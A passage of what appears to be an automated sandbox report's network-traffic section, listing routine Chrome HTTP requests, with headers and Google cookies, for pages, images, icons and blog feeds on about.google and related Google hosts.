SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; SUPPORT_CONTENT=638149462623262391-2100551733; _ga_H30R9PNQFN=GS1.1.1679378263.1.0.1679378263.0.0.0; _ga=GA1.3.2027229361.1679378263; _gid=GA1.3.1362183731.1679378264; _gat_gtag_UA_175894890_5=1; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: support.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; SUPPORT_CONTENT=638149462623262391-2100551733; _ga_H30R9PNQFN=GS1.1.1679378263.1.0.1679378263.0.0.0; _ga=GA1.3.2027229361.1679378263; _gid=GA1.3.1362183731.1679378264; _gat_gtag_UA_175894890_5=1; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /about?hl=en-US HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiTocsBCPyqzAEIvLzMAQj1vMwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEIncnMAQjjy8wBSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /?hl=en-US HTTP/1.1Host: about.googleConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets-main/css/index.min.css?cache=9ad158b HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://about.google/?hl=en-USAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets-main/css/home.min.css?cache=02dd6cc HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://about.google/?hl=en-USAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /4vIWhSoCMzWHL20aDe5EGrv5EypSOWfQjoeBfA9Z32YCinijg5J0S1Sn6FN2uTgbm_A0X0khZHn3Btl2djAqyaXjXpHyADHl4mnlIbc0GRutLqLENkU=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets-main/js/polyfills.min.js?cache=8b7cf26 HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.google/?hl=en-USAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /DqEqxO5Pq4lGN3zdBfDmSWfG-20am-ORpzPA-DxCsnvadS7m_PcooNUPdggBippJsORIkB5ttL61Xa-pea_bzBqQf1FvTtqwIhPslB34qDfvvb9hp3A=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /m-Ok3vfGKDPtv6u7QjPVLMFAw1rXk28qMAEujh1qRxXf4eHUZlVsV27Sqgqh7Ck98YX5OFCRc6ZjGyyaihts5C8IASljQdoGjnD8M_g5Il4W2eorQw=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets-main/js/index.min.js?cache=db41850 HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.google/?hl=en-USAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets-main/img/glue-google-color-logo.svg HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/?hl=en-USAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets-main/img/glue-icon-expand-more.svg HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/?hl=en-USAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets-main/img/glue-google-solid-logo.svg HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/?hl=en-USAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets-main/img/glue-help.svg HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/?hl=en-USAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /zJJ46221TjPk5JoBgl6ZsaGsKkhMeqOzEFFyj5qi_yRaD0kwmYY-wjn-xitI7EPmO3x8WTNGlW4d_-ExdVVErSUD-d_V-urpEhbDZQeGmrCMC9JL2Q=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sarNvJGsElTyskguj3eBs8jWOiO3GZzu0FTOotLbaVX4D9Wt17OLO7MRdFiedqYyzjL44Hl8y3WzgOmMOCarw9poy4C1m1f8Sb9jgtULLDgpyeM9dnY=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /EICyRNLJhOmFUAfdDXw9x4mQAeefUSSZyYNNVxLzCO6q7VfCIMG9faB3-q8aSqz6xtHUzgJ14Pdgpl3UoMEDU8fCVWQ-pyhxBbbM1lsBf-Wj3xX_FtxW=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /doodles/history/3/20?cb=initCarousel HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /4vIWhSoCMzWHL20aDe5EGrv5EypSOWfQjoeBfA9Z32YCinijg5J0S1Sn6FN2uTgbm_A0X0khZHn3Btl2djAqyaXjXpHyADHl4mnlIbc0GRutLqLENkU=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /DqEqxO5Pq4lGN3zdBfDmSWfG-20am-ORpzPA-DxCsnvadS7m_PcooNUPdggBippJsORIkB5ttL61Xa-pea_bzBqQf1FvTtqwIhPslB34qDfvvb9hp3A=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /api/v2/latest/?tags=accessibility,ads,ai,alphabet,area-120,arts-and-culture,civics,company-announcements,data-centers-and-infrastructure,design,developers,digital-wellbeing,diversity-and-inclusion,doodles,education,entrepreneurs,families,google-news-initiative,googleorg,grow-with-google,health,next-billion-users,nonprofits,public-policy,research,safety-and-security,small-business,sustainability HTTP/1.1Host: www.blog.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://about.googleSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /m-Ok3vfGKDPtv6u7QjPVLMFAw1rXk28qMAEujh1qRxXf4eHUZlVsV27Sqgqh7Ck98YX5OFCRc6ZjGyyaihts5C8IASljQdoGjnD8M_g5Il4W2eorQw=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets-main/img/glue-google-color-logo.svg HTTP/1.1Host: about.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets-main/img/glue-icon-expand-more.svg HTTP/1.1Host: about.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /zJJ46221TjPk5JoBgl6ZsaGsKkhMeqOzEFFyj5qi_yRaD0kwmYY-wjn-xitI7EPmO3x8WTNGlW4d_-ExdVVErSUD-d_V-urpEhbDZQeGmrCMC9JL2Q=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets-main/img/glue-google-solid-logo.svg HTTP/1.1Host: about.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sarNvJGsElTyskguj3eBs8jWOiO3GZzu0FTOotLbaVX4D9Wt17OLO7MRdFiedqYyzjL44Hl8y3WzgOmMOCarw9poy4C1m1f8Sb9jgtULLDgpyeM9dnY=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /EICyRNLJhOmFUAfdDXw9x4mQAeefUSSZyYNNVxLzCO6q7VfCIMG9faB3-q8aSqz6xtHUzgJ14Pdgpl3UoMEDU8fCVWQ-pyhxBbbM1lsBf-Wj3xX_FtxW=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /api/v2/latest/?show_hero=true&tags=android,android-tv,calendar,chrome,chromebooks,chromecast,classroom,docs,drive,forms,gmail,google-ads,google-assistant,google-cloud,google-duo,google-earth,google-fi,google-fit,google-one,google-pay,google-play,google-shopping,google-voice,google-wifi,meet,keep,maps,messages,news,photos,pixel,pixelbook,search,sheets,sites,slides,stadia,translate,wear-os-by-google,youtube HTTP/1.1Host: www.blog.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://about.googleSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets-main/img/glue-help.svg HTTP/1.1Host: about.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /-tJ0exa-sFRDGwxCfFtT3kaKnhcmHAvtjqHDP41VZhmjMHrNxR7jTkuXxHlonYHF-0oB9I62PsCqlLDA2P8bGcuVdx2yoV5n02Luyqj5E_Sn1kPHeg=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /LOrhe71Tt-bTc3xdZDG8fwvwhs8qF0ygHRj9DjbcQpP6WWkHFwd8Kca9FbMjZ_y8GVAVlmDhEYlkQxQCVnvCstsYzS_ahoD4SPjUYQo8T3aO3ifLzi8=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /XH1nTzt31w0D2Mh0RIwO57SRWR9xEGnCj9PIt7H6OIWfZJNhuCQTrBJWbzzcr5x1NrYFu2Tshk-YURNywcKeUbL7Syamsfqb1ZAh9MTTnQVKJavTNHIy=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
